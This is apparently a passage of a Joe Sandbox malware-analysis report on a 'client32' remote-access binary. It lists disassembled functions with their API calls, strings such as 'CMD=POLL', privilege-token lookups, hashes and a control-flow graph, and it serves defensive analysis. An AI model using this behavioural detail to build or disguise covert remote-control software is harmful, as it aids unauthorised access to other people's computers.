                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                              • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                              • API String ID: 2511061093-2542869446
                                                                              • Opcode ID: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                              • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                              • Opcode Fuzzy Hash: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                              • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91
                                                                              Function 11134830 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2340 11134830-1113486c 2341 11134872-11134894 call 1105e820 2340->2341 2342 11134b94-11134baf call 11162bb7 2340->2342 2341->2342 2347 1113489a-111348ae GetLocalTime 2341->2347 2348 111348d1-11134953 LoadLibraryA call 11009940 call 110161e0 GetCurrentProcess 2347->2348 2349 111348b0-111348cc call 11147060 2347->2349 2356 11134955-1113496b GetProcAddress 2348->2356 2357 1113496d-11134974 GetProcessHandleCount 2348->2357 2349->2348 2356->2357 2359 11134976-11134978 SetLastError 2356->2359 2358 1113497e-11134986 2357->2358 2360 111349a2-111349ae 2358->2360 2361 11134988-111349a0 GetProcAddress 2358->2361 2359->2358 2364 111349b0-111349c8 GetProcAddress 2360->2364 2366 111349ca-111349d5 2360->2366 2361->2360 2362 111349d7-111349e2 SetLastError 2361->2362 2362->2364 2365 111349e4-111349ec SetLastError 2364->2365 2364->2366 2367 111349ef-111349ff GetProcAddress 2365->2367 2366->2367 2369 11134a01-11134a0d K32GetProcessMemoryInfo 2367->2369 2370 11134a0f-11134a11 SetLastError 2367->2370 2371 11134a17-11134a25 2369->2371 2370->2371 2372 11134a33-11134a3e 2371->2372 2373 11134a27-11134a2f 2371->2373 2374 11134a40-11134a48 2372->2374 2375 11134a4c-11134a57 2372->2375 2373->2372 2374->2375 2376 11134a65-11134a6f 2375->2376 2377 11134a59-11134a61 2375->2377 2378 11134a71-11134a78 2376->2378 2379 11134a7a-11134a7d 2376->2379 2377->2376 2380 11134a7f-11134a8d call 11147060 2378->2380 2379->2380 2381 11134a90-11134aa2 2379->2381 2380->2381 2385 11134b6a-11134b78 2381->2385 2386 11134aa8-11134aba call 110642e0 2381->2386 2387 11134b7a-11134b7b FreeLibrary 2385->2387 2388 11134b7d-11134b85 2385->2388 2386->2385 2393 11134ac0-11134ae1 call 1105e820 2386->2393 2387->2388 2391 11134b87-11134b88 FreeLibrary 2388->2391 2392 11134b8a-11134b8f 2388->2392 2391->2392 2392->2342 2394 11134b91-11134b92 FreeLibrary 2392->2394 2397 11134ae3-11134ae9 2393->2397 2398 11134aef-11134b0b call 1105e820 2393->2398 2394->2342 2397->2398 2399 11134aeb 2397->2399 2402 11134b16-11134b32 call 1105e820 2398->2402 2403 11134b0d-11134b10 2398->2403 2399->2398 2407 11134b34-11134b37 2402->2407 2408 11134b3d-11134b59 call 1105e820 2402->2408 2403->2402 2404 11134b12 2403->2404 2404->2402 2407->2408 2410 11134b39 2407->2410 2412 11134b60-11134b63 2408->2412 2413 11134b5b-11134b5e 2408->2413 2410->2408 2412->2385 2414 11134b65 call 11027de0 2412->2414 2413->2412 2413->2414 2414->2385
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,EE49F673), ref: 1113489E
                                                                              • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                              • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                              • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                              • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                              • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                              • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                              • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                              • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                              • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                              • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                              • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                              • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                              • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                              • API String ID: 263027137-1001504656
                                                                              • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                              • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                              • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                              • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                              Function 6EEF91F0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 97sleepnetworkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • #16.WSOCK32(00000000,009686C7,6EF03361,00000000,00000000,6EF03361,00000007), ref: 6EEF924C
                                                                              • WSAGetLastError.WSOCK32(00000000,009686C7,6EF03361,00000000,00000000,6EF03361,00000007), ref: 6EEF925B
                                                                              • GetTickCount.KERNEL32 ref: 6EEF9274
                                                                              • Sleep.KERNEL32(00000001,00000000,009686C7,6EF03361,00000000,00000000,6EF03361,00000007), ref: 6EEF92A8
                                                                              • GetTickCount.KERNEL32 ref: 6EEF92B0
                                                                              • Sleep.KERNEL32(00000014), ref: 6EEF92BC
                                                                              Strings
                                                                              • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6EEF922B
                                                                              • *RecvTimeout, xrefs: 6EEF927B
                                                                              • ReadSocket - Error %d reading response, xrefs: 6EEF92F7
                                                                              • ReadSocket - Would block, xrefs: 6EEF928A
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6EEF9226
                                                                              • ReadSocket - Connection has been closed by peer, xrefs: 6EEF92E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountSleepTick$ErrorLast
                                                                              • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                              • API String ID: 2495545493-2497412063
                                                                              • Opcode ID: 67b7e1b85a07a734c3b6a9abcf5299598ed9429308a6b5b89bd9a1742b28dbef
                                                                              • Instruction ID: a00dc7df9088a4e4eb63b60f3fa708e1a8357133cf2aeed3582989af9dfa14d4
                                                                              • Opcode Fuzzy Hash: 67b7e1b85a07a734c3b6a9abcf5299598ed9429308a6b5b89bd9a1742b28dbef
                                                                              • Instruction Fuzzy Hash: E331C275E10208EFEB10DFF8E884BCEB7B8EF45314F204869E948DB340E77299458691
                                                                              Function 6EF03130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemTime.KERNEL32(?,?,?,910C354D,94E48BC1,910C34B3,FFFFFFFF,00000000), ref: 6EF031E2
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6EF2ECB0), ref: 6EF031EC
                                                                              • GetSystemTime.KERNEL32(?,94E48BC1,910C34B3,FFFFFFFF,00000000), ref: 6EF0322A
                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6EF2ECB0), ref: 6EF03234
                                                                              • EnterCriticalSection.KERNEL32(6EF3B898,?,910C354D), ref: 6EF032BE
                                                                              • LeaveCriticalSection.KERNEL32(6EF3B898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6EF032D3
                                                                              • GetCurrentThreadId.KERNEL32 ref: 6EF0334D
                                                                                • Part of subcall function 6EF0BA20: __strdup.LIBCMT ref: 6EF0BA3A
                                                                                • Part of subcall function 6EF0BB00: _free.LIBCMT ref: 6EF0BB2D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                              • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                              • API String ID: 1510130979-3441452530
                                                                              • Opcode ID: 060018e84d15ab3a751f0b7b8a6ac70073d7b9c9f3a3d0e43fbeb4f0c82fb2b8
                                                                              • Instruction ID: 8c4a49204a56be232f6c525e312f36c6308882600db8acc3e1d5d5a4f5ae9d5d
                                                                              • Opcode Fuzzy Hash: 060018e84d15ab3a751f0b7b8a6ac70073d7b9c9f3a3d0e43fbeb4f0c82fb2b8
                                                                              • Instruction Fuzzy Hash: 44616272910618AFCB14DFE4D8A4FEEB7B9FF49304F10491EE416A7280EB74A504DBA1
                                                                              Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(111F1EF0,75A78400), ref: 11145CA0
                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                              • _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A78400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              • _strncpy.LIBCMT ref: 11145DCA
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                              • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                              • API String ID: 3299820421-2117887902
                                                                              • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                              • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                              • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                              • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                              Function 11116880 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                              • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                              • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                              • CoUninitialize.OLE32(00000000), ref: 111169E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                              • String ID: SHELL32.DLL$SHGetSettings
                                                                              • API String ID: 4195908086-2348320231
                                                                              • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                              • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                              • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                              • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                              Function 11073680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: NBCTL32.DLL$_License$serial_no
                                                                              • API String ID: 2102423945-35127696
                                                                              • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                              • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                              • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                              • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                              Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID: Client32$NSMWClass$NSMWClass
                                                                              • API String ID: 3192549508-611217420
                                                                              • Opcode ID: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                              • Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
                                                                              • Opcode Fuzzy Hash: a586b2f275b23202da33eeeabda63bfb0fcf210cd7da2103abc854b9584f9786
                                                                              • Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
                                                                              Function 1109ED30 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                              • EqualSid.ADVAPI32(?,00FD3B90,?,00000001,00000001), ref: 1109EDC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InformationToken$AllocateEqualInitialize
                                                                              • String ID:
                                                                              • API String ID: 1878589025-0
                                                                              • Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                              • Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
                                                                              • Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
                                                                              • Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
                                                                              Function 1109D860 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,EE49F673,00080000,00000000,?), ref: 1109D88D
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
